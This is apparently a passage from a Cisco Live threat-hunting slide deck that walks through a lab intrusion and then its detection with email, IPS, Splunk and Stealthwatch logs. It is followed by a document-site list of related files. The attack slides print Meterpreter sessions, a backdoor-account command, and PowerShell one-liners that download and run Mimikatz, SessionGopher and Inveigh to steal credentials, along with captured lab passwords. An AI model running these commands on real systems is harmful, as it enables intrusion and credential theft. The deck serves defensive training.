TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 754
All Three “metepreter” Sessions
meterpreter > background S[*] Backgrounding session 2...
msf5 exploit(windows/local/bypassuac) > sessions -l

Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows client34-PC\client34 @ CLIENT34-
PC 192.168.77.77:4444 -> 192.168.34.34:50849

2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ CLIENT34- This one is

PC 192.168.77.77:5555 -> 192.168.34.34:50887 privileged

3 meterpreter x86/windows client34-PC\client34 @ CLIENT34-

PC 192.168.77.77:6666 -> 192.168.34.34:50914

C:\Windows\system32>net1 user databasebackup secretpass1 /add

net1 user databasebackup secretpass1 /add

The command completed successfully.

Who dares to delete a „backup” user?

C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object

Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellM
afia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

As good as password

Password

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 757
Let’s Find The Next Victim
PowerShell script downloaded from the internet
C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/SessionGopher/m
aster/SessionGopher.ps1'); Invoke-SessionGopher

Digging for saved RDP sessions Digging for saved WinSCP sessions

[+] Digging on client34-PC ... WinSCP Sessions

Microsoft Remote Desktop (RDP)
Sessions Source : client34-PC\client34
Session : [email protected]
Source : client34-PC\client34 Hostname : mrblue.budlab.net
Hostname : mrorange.budlab.net Username : mrblue
Username : budlab.net\mrorange Password : rainbow

Source : client34-PC\client34
Session : [email protected]
Hostname : mrbrown.budlab.net
Username : mrbrown
Password : rainbow

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 758
Or Simply Ask For The Password
C:\Windows\system32>Powershell.exe -NoP -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-
Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -HTTP Y -HTTPS Y
-mDNS Y -NBNS Y -Proxy Y -WPADAuth Basic -HTTPAuth Basic

Respond to those queries

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 759
Once You Are In,
I need Just One
IOC To Catch You!
If You Had Watched the Live Mail Logs…
Cisco Email Security Appliance “mail_logs” highly unlikely

Message ID Sender and recipient Unknown file, sending for

domains are same analysis
Sat Jan 11 23:15:19 2020 Info: Start MID 39803 ICID 1737
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 From: <[email protected]>
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 RID 0 To: <[email protected]>
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 RID 1 To: <[email protected]>
Sat Jan 11 23:15:19 2020 Info: MID 39803 ICID 1737 RID 2 To: <[email protected]>
...
Sat Jan 11 23:15:20 2020 Info: MID 39803 Subject 'New SSH client to be used'
Sat Jan 11 23:15:21 2020 Info: MID 39803 using engine: CASE spam negative
Sat Jan 11 23:15:22 2020 Info: MID 39803 AMP file reputation verdict : UNKNOWN(File
analysis pending)
Sat Jan 11 23:15:22 2020 Info: MID 39803 SHA
b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38 filename puttyLIVE.exe
queued for possible file analysis upload
...
Sat Jan 11 23:15:23 2020 Info: Message finished MID 39803 done

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 761
Investigation Can Be Triggered On Events - 1
Retrospective alert from Cisco ESA
From: IronPort C000V Alert <[email protected]>
To: [email protected]
Subject: Info <AMP> mail.budlab.net:AMP Retrospective Alert:puttyLIVE.exe attachment
verdict changed from VERDICT UNKNOWN to MALICIOUS
Disposition change
The Info message is:
Retrospective verdict received for puttyLIVE.exe. File name and hash
SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38
Timestamp: 2020-01-12T00:44:35Z
Verdict: MALICIOUS
Spyname: W32.B8FE425AD0-95.SBX.TG

Total users affected: 3 Mailboxes to check

----------- Affected Messages ---------------
MID : 39803
Subject : New SSH client to be used
From : [email protected]
To : [email protected],[email protected],[email protected]
File name : puttyLIVE.exe

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 762
Cisco Email Security Appliance AMP log
mail.budlab.net> grep 39803 amp
Unknown file at 23:15
Sat Jan 11 23:15:21 2020 Info: File reputation query initiating. File Name
= 'puttyLIVE.exe', MID = 39803, File Size = 1425408 bytes, File Type =
application
Disposition has changed at 23:22
Sat Jan 11 23:15:22 2020 Info: Response received for file reputation
query from Cloud. File Name = 'puttyLIVE.exe', MID = 39803, Disposition =
FILE UNKNOWN, Malware = None, Analysis Score = 0, sha256 =
b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38,
upload_action = Recommended to send the file for analysis

Sat Jan 11 23:22:22 2020 Info: File analysis complete. MID: 39803,
SHA256: b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38,
File name: puttyLIVE.exe, Submit Timestamp: 1578780925, Update Timestamp:
1578781342, Disposition: 3, Score: 95, Analysis Id:
'37a07d92b2ea9b08906f9a580df1b5e2', Details: W32.B8FE425AD0-95.SBX.TG

Disposition changed

A machine learning model has

determined that one or more artifacts
are likely malicious. The machine
learning model is trained on a very
large number of samples.

Backdoor connections

Some malware applications write code into

areas of memory intended for data (such
as a thread's stack) and then the
application executes the malicious code.
This could indicate the presence of code
injection, into itself or a remote
process.

A PE file was found with an invalid

checksum. The PE Optional Header
contains a field that holds a checksum.
This is generated when the PE is built
and should be static across the life of
the executable. Malware may modify the
executable, but many do not repair the
checksum to account for permanent
changes.

Possible victim IPs

IPS event details

Malware event details

APP introduced “puttyLIVE.exe”

Snort rule ID (click for details) Port 4444 (initial), 5555 (privileged) and 6666 (persistence)

FTD detected the event

SNORT rule details

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"INDICATOR-COMPROMISE

Meterpreter payload download attempt"; flow:to_client,established;
content:"packet_call_completion_handlers"; fast_pattern:only;
metadata:policy max-detect-ips drop, policy security-ips drop;
classtype:trojan-activity; sid:44728; rev:3; gid:1;© 2020) Cisco and/or its affiliates. All rights reserved. Cisco Public
Investigation Can Be Triggered On Events - 3

Search for a specific IP

Attacker Victim

Ports
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 773
Raw Log In Splunk
Process Level Information From AnyConnect NVZ Module
New Search
da="192.168.77.77" 4444
Source address Process hash Destination address
Process name Dst port
Jan 11 23:59:12 127.0.0.1 Jan 11 23:59:12 splunk.budlab.net
fv="nvzFlow_v3" pr="6" sa="192.168.34.34" sp="50849" da="192.168.77.77"
dp="4444" fss="1578782333" fst="Sat Jan 11 23:38:53 2020"
fes="1578783598" fet="Sat Jan 11 23:59:58 2020"
udid="612296565E6F2BBE27230AB731334DE84D9B7CA9" liuid="''" liuat="0"
pa="client34-PC\client34" paa="client34-PC" pap="client34" puat="2"
pn="puttylive.exe"
ph="B8FE425AD09DE7664FD5391BF72D6E61BF41D8AAC7CA594D4F0FF9DEC2F53B38"
ppa="client34-PC\client34" ppuat="2" ppn="explorer.exe"
pph="6A671B92A69755DE6FD063FCBE4BA926D83B49F78C42DBAEED8CDB6BBC57576A"
ibc="419698" obc="10679" ds="''" dh="Unknown" iid="2" mnl="''" mhl="''"
liuidp="unknown"
Parent process hash Parent process name

Jan 11 23:59:12 127.0.0.1 Jan 11 23:59:12 splunk.budlab.net

fv="nvzFlow_v3" pr="6" sa="192.168.34.34" sp="50849" da="192.168.77.77"
dp="4444" fss="1578782333" fst="Sat Jan 11 23:38:53 2020"
fes="1578783598" fet="Sat Jan 11 23:59:58 2020"
udid="612296565E6F2BBE27230AB731334DE84D9B7CA9" liuid="''" liuat="0"
pa="client34-PC\client34" paa="client34-PC" pap="client34" puat="2"
pn="puttylive.exe"
ph="B8FE425AD09DE7664FD5391BF72D6E61BF41D8AAC7CA594D4F0FF9DEC2F53B38"
ppa="client34-PC\client34" ppuat="2" ppn="explorer.exe"
pph="6A671B92A69755DE6FD063FCBE4BA926D83B49F78C42DBAEED8CDB6BBC57576A"
ibc="419698" obc="10679" ds="''" dh="Unknown" iid="2" mnl="''" mhl="''"
liuidp="unknown"

Show me that nice relation graph!

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 775
Cisco Threat Response
Details For „puttylive.com”
Created by
Cmd shell
Parent process,
executed by
File name
Network
connection

Email subject Target system

Notepad launched

Spoofed email Smtp Victims

src?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 776
Adding One More Element To The Investigation
Triggered IPS Rules and Stealthwatch Alarms Revealed
Snort Rules
ICMP too large,
Added to the
exfiltration?
investigation

Pivot to Stealthwatch
Stealthwatch Alarm

• Clients Acting As Server

• DNS Server Among Clients
• Link Local Multicast Name Resolution
Flow
details

Initial backdoor
connection

UAC bypass
priv escalation

Elevated session

• Security is all about architecture. It’s seamless cooperation of point

products.
• With proper integration you can automatize task, and you can prevent
easy attacks.
• But, You still need a human to do an investigation
• „Detect and forget” approach does NOT work! If Your security system
detects something be curious and ask the question why it
happened?!? And investigate it!

• Thank you very much for your attendance and interaction

• Speakers

• Bart Van Hoecke (HW/SW, Identity & TrustSec)

• Gyorgy Acs (REST API, TLS Decryption, RAVPN)

• Sven Kutzer (CDO, FDM, Migration, Backup and Restore, AMP, Threat Hunting Part I)

• Szilard Csordas (A Day in a Life of a Packet, Threat Hunting Part II)

• Dragan Novakovic (Deployment, AVC & IPS, Security Intelligence, UI Improvements)

Breakout sessions

• BRKSEC-3328, Firepower NGFW Management: Making Firepower Management Center (FMC) Do

More
• BRKSEC-2020, Firepower NGFW in the DC and Enterprise - Deployment Tips and New Features
• BRKSEC-3300, Advanced IPS Deployment with Firepower NGFW
• BRKSEC-3032, Firepower NGFW Clustering Deep Dive
• BRKSEC-3035, Firepower Platforms Deep Dive
• BRKSEC-3093, ARM yourself using NGFWv and ASAv (Azure)
• BRKSEC-3455, Dissecting Firepower NGFW: Architecture and Troubleshooting
• BRKSEC-3063, Decrypting the Internet with Firepower!
• BRKSEC-2382, Application and User-centric Protection with Duo Security
• BRKSEC-2494, Maximizing Threat Efficacy and Optimizing Performance of Firepower Threat Defense
(FTD)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 793
For Your
Related Sessions Reference

PSO, Instructor Led Labs and Walk in Labs

• LTRSEC-3001, Deep Dive Lab on ASA, FTD, and Firepower in ACI

• LTRSEC-3052, Deploy NGFWv & ASAv in Public Cloud (AWS & Azure)
• LTRSEC-3460, Firepower Data-Path troubleshooting (A practical hands on lab)
• LABSEC-4490, Firepower v6.5 and DUO Integration : Configuring and Troubleshooting DUO for
Cisco AnyConnect VPN with Firepower Device Manager (FDM)
• PSOSEC-4905, The Future of the Firewall

wonder who you can bring

your experience pain points to? Come join our Design Thinking session on
Tuesday or Thursday! Signup using QR
code 1 (above).
have ideas that keep you
up at night?

want to improve product 2

experience for yourself?

Come talk to Security User Don’t have time at Cisco Live? Join our UX
Experience (UX) Team!! participant database and we’ll be in touch
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco
to showcase upcoming features and get
Confidential
your feedback! Signup using QR code 2.
Complete your
online session
survey • Please complete your session survey
after each session. Your feedback
is very important.
• Complete a minimum of 4 session
surveys and the Overall Conference
survey (starting on Thursday) to
receive your Cisco Live t-shirt.
• All surveys can be taken in the Cisco Events
Mobile App or by logging in to the Content
Catalog on ciscolive.com/emea.

Cisco Live sessions will be available for viewing on

demand after the event at ciscolive.com.

Demos in the
Walk-In Labs
Cisco Showcase

Meet the Engineer

Related sessions
1:1 meetings

230_Hunting_Web_Shells
No ratings yet
230_Hunting_Web_Shells
151 pages
SEM III - Advanced Accounting (EM)
67% (3)
SEM III - Advanced Accounting (EM)
4 pages
CT Test Report
100% (1)
CT Test Report
3 pages
SumoLogic - Professional Services - Security Analytics PDF
No ratings yet
SumoLogic - Professional Services - Security Analytics PDF
75 pages
Palo Alto Network
No ratings yet
Palo Alto Network
4 pages
Trellix Helix Customer Presentation
No ratings yet
Trellix Helix Customer Presentation
30 pages
PaltoAlto_cortex_guide_automating-malware-investigations_122123
No ratings yet
PaltoAlto_cortex_guide_automating-malware-investigations_122123
10 pages
Certified SOC Analyst-Course Outline
No ratings yet
Certified SOC Analyst-Course Outline
28 pages
survey camp report ncit pokhara university
No ratings yet
survey camp report ncit pokhara university
120 pages
Detecting P2P Botnets Through Network Be
0% (1)
Detecting P2P Botnets Through Network Be
13 pages
TESDA-LIT Mushroom Project
No ratings yet
TESDA-LIT Mushroom Project
77 pages
Au-Backlinks
No ratings yet
Au-Backlinks
240 pages
Securebasebook PDF
No ratings yet
Securebasebook PDF
184 pages
Cybereason Labs Analysis Operation Cobalt Kitty-Part1
No ratings yet
Cybereason Labs Analysis Operation Cobalt Kitty-Part1
41 pages
Annex IV - Explained & Sewage Treatment-1
No ratings yet
Annex IV - Explained & Sewage Treatment-1
8 pages
Fireware Essentials - Student Guide - (En US) - v12 1 PDF
No ratings yet
Fireware Essentials - Student Guide - (En US) - v12 1 PDF
479 pages
Evolution Firewall - 1
100% (1)
Evolution Firewall - 1
31 pages
Corelight's Introductory Guide To Threat Hunting With Zeek (Bro) Logs
No ratings yet
Corelight's Introductory Guide To Threat Hunting With Zeek (Bro) Logs
6 pages
FireEye Endpoint Security HX Series
No ratings yet
FireEye Endpoint Security HX Series
20 pages
MonoRail Calculation
50% (2)
MonoRail Calculation
4 pages
A Day in The Life of A Cybersecurity Professional
No ratings yet
A Day in The Life of A Cybersecurity Professional
46 pages
Intermediate Microeconomics
No ratings yet
Intermediate Microeconomics
35 pages
Tech Sdn10 SP Netconf Yang Restconf Martinkramolis
No ratings yet
Tech Sdn10 SP Netconf Yang Restconf Martinkramolis
34 pages
Ltrsec 3001
No ratings yet
Ltrsec 3001
41 pages
Day2-03-CCSBA-Troubleshooting and Debugging-V7.3-169
No ratings yet
Day2-03-CCSBA-Troubleshooting and Debugging-V7.3-169
21 pages
Bluecoat Manual
100% (1)
Bluecoat Manual
990 pages
Cyber Security Course Syllabus: Day Topic / Contents Remarks 1 FN
No ratings yet
Cyber Security Course Syllabus: Day Topic / Contents Remarks 1 FN
3 pages
Network Firewall Developer Guide
No ratings yet
Network Firewall Developer Guide
118 pages
06 Scaling With Google Cloud Operations
No ratings yet
06 Scaling With Google Cloud Operations
13 pages
SOC Analyst
No ratings yet
SOC Analyst
13 pages
Banks in The Uk
No ratings yet
Banks in The Uk
17 pages
Mahalanobis Distance
No ratings yet
Mahalanobis Distance
6 pages
2020
No ratings yet
2020
267 pages
Part Test 08 _ Physics __ Test Paper __ KCET Safalta Test Series
No ratings yet
Part Test 08 _ Physics __ Test Paper __ KCET Safalta Test Series
10 pages
SPE-178133-MS Heavy Crude Oil Rheology Improvement Using Naturally Extracted Surfactant
No ratings yet
SPE-178133-MS Heavy Crude Oil Rheology Improvement Using Naturally Extracted Surfactant
17 pages
Zen Manual 311011
No ratings yet
Zen Manual 311011
20 pages
A10 NFV Ecosystem Integration Overview
No ratings yet
A10 NFV Ecosystem Integration Overview
38 pages
Endpoint Security Agent: Agent Administration Guide Release 29
No ratings yet
Endpoint Security Agent: Agent Administration Guide Release 29
151 pages
Digi DS-560
No ratings yet
Digi DS-560
2 pages
Adobe Scan 17 May 2025
No ratings yet
Adobe Scan 17 May 2025
8 pages
Ajcea 8 3 4
No ratings yet
Ajcea 8 3 4
14 pages
Paper21 - Consolidation of Continuous Fibre Reinforced Composites in Additive Processes - A Review
No ratings yet
Paper21 - Consolidation of Continuous Fibre Reinforced Composites in Additive Processes - A Review
9 pages
Sentinel LM Developer Guide
No ratings yet
Sentinel LM Developer Guide
272 pages
17 Soar
No ratings yet
17 Soar
70 pages
Vulnerability Scanning
No ratings yet
Vulnerability Scanning
12 pages
Stpp Tari k7
No ratings yet
Stpp Tari k7
2 pages
Sirois, 2014 Self Compassion, Affect and Self Behavior
No ratings yet
Sirois, 2014 Self Compassion, Affect and Self Behavior
10 pages
Traditional Versus Software-Defined Networks: Open Transcript
No ratings yet
Traditional Versus Software-Defined Networks: Open Transcript
4 pages
Quotation For NDK Sopan
No ratings yet
Quotation For NDK Sopan
4 pages
PowerPoint Theory Test
100% (1)
PowerPoint Theory Test
3 pages
Micro Segmentation Use Case Brief
No ratings yet
Micro Segmentation Use Case Brief
5 pages
OSPF Area 0.0.0.1: For Illustrative Purposes Only Simulator Is NOT Connected To Outside Physical Switches
No ratings yet
OSPF Area 0.0.0.1: For Illustrative Purposes Only Simulator Is NOT Connected To Outside Physical Switches
4 pages
DeepFake Video Detection
No ratings yet
DeepFake Video Detection
22 pages
Mat575 2009-1
No ratings yet
Mat575 2009-1
5 pages
Latest Cworld1 Syllabus
No ratings yet
Latest Cworld1 Syllabus
14 pages
CCST EH WAP Course Modules
No ratings yet
CCST EH WAP Course Modules
9 pages
r9800 2011 (8a4)
No ratings yet
r9800 2011 (8a4)
12 pages
Digital Pitot Static Test Set DPS450
No ratings yet
Digital Pitot Static Test Set DPS450
1 page
SoC interview questions
No ratings yet
SoC interview questions
24 pages
YI-AQE Status Report (07 03 2015)
No ratings yet
YI-AQE Status Report (07 03 2015)
4 pages
3 Mobilesecurityintro
No ratings yet
3 Mobilesecurityintro
35 pages
Honeypot Technology
No ratings yet
Honeypot Technology
18 pages
01 - Carbon Black Cloud - Audit and Remediation User Guide
No ratings yet
01 - Carbon Black Cloud - Audit and Remediation User Guide
51 pages
The Art of Recognizing and Surviving SOC Burnout
No ratings yet
The Art of Recognizing and Surviving SOC Burnout
29 pages
F5 5G WP BuildingBetter5GSecurity Final 120720
No ratings yet
F5 5G WP BuildingBetter5GSecurity Final 120720
14 pages
Understanding Cybersecurity
No ratings yet
Understanding Cybersecurity
13 pages
SandBlast Network PTK Training Labs-V7.12 CloudShare
No ratings yet
SandBlast Network PTK Training Labs-V7.12 CloudShare
60 pages
AWS Security - Staying On Top of The Cloud
No ratings yet
AWS Security - Staying On Top of The Cloud
36 pages
PenTest6 18 Preview PDF
No ratings yet
PenTest6 18 Preview PDF
25 pages
Cyops1.1 Chp07-Dts Oa
No ratings yet
Cyops1.1 Chp07-Dts Oa
49 pages
Dm542 Manual
No ratings yet
Dm542 Manual
5 pages
FireEye Endpoint Deployment Quick Start Guide
No ratings yet
FireEye Endpoint Deployment Quick Start Guide
9 pages
Intrusion DPS
No ratings yet
Intrusion DPS
26 pages
NSE 1: The Threat Landscape: Study Guide
67% (3)
NSE 1: The Threat Landscape: Study Guide
30 pages
Sourcefire Next-Generation IPS (NGIPS) White Paper
No ratings yet
Sourcefire Next-Generation IPS (NGIPS) White Paper
10 pages
Sample Exam Questions
No ratings yet
Sample Exam Questions
6 pages
Alert Analysis L1 External
No ratings yet
Alert Analysis L1 External
7 pages
Chapter 2 The History and Development of Administrative Law
No ratings yet
Chapter 2 The History and Development of Administrative Law
10 pages
PAM Suite Comparision
No ratings yet
PAM Suite Comparision
5 pages
Elective Midterm Handouts
No ratings yet
Elective Midterm Handouts
6 pages
SIEM - Plant Cybersecurity Monitoring Project Proposed Release Plan
No ratings yet
SIEM - Plant Cybersecurity Monitoring Project Proposed Release Plan
4 pages
Business Profile
No ratings yet
Business Profile
5 pages
Difference Between IDS and IPS and Firewall
No ratings yet
Difference Between IDS and IPS and Firewall
3 pages
Troubleshooting Guide For SEP
No ratings yet
Troubleshooting Guide For SEP
16 pages
TCP Dump
No ratings yet
TCP Dump
5 pages
Creating and Maintaining SOC MSP1 Whitepaper
No ratings yet
Creating and Maintaining SOC MSP1 Whitepaper
11 pages
Mapping Cyberbit Range To MITRE ATT&CK For Enhanced Training
No ratings yet
Mapping Cyberbit Range To MITRE ATT&CK For Enhanced Training
8 pages
Web Application Firewalls: When Are They Useful?: The Owasp Foundation
No ratings yet
Web Application Firewalls: When Are They Useful?: The Owasp Foundation
44 pages
DS ThreatEmulation Final
No ratings yet
DS ThreatEmulation Final
2 pages
DM Plant
No ratings yet
DM Plant
9 pages
Splunk Punk: Taming Logs, Alerts, and the Chaos of SIEM
From Everand
Splunk Punk: Taming Logs, Alerts, and the Chaos of SIEM
Scott Markham
No ratings yet
Mastering Puppet
From Everand
Mastering Puppet
Thomas Uphill
No ratings yet
Configuring IPCop Firewalls: Closing Borders with Open Source
From Everand
Configuring IPCop Firewalls: Closing Borders with Open Source
Barrie Dempster
No ratings yet
Microsoft Azure Fundamentals Certification and Beyond: A complete AZ-900 exam guide with online mock exams, flashcards, and hands-on activities
From Everand
Microsoft Azure Fundamentals Certification and Beyond: A complete AZ-900 exam guide with online mock exams, flashcards, and hands-on activities
Steve Miles
No ratings yet
Mobile Malware Protection Third Edition
From Everand
Mobile Malware Protection Third Edition
Gerardus Blokdyk
No ratings yet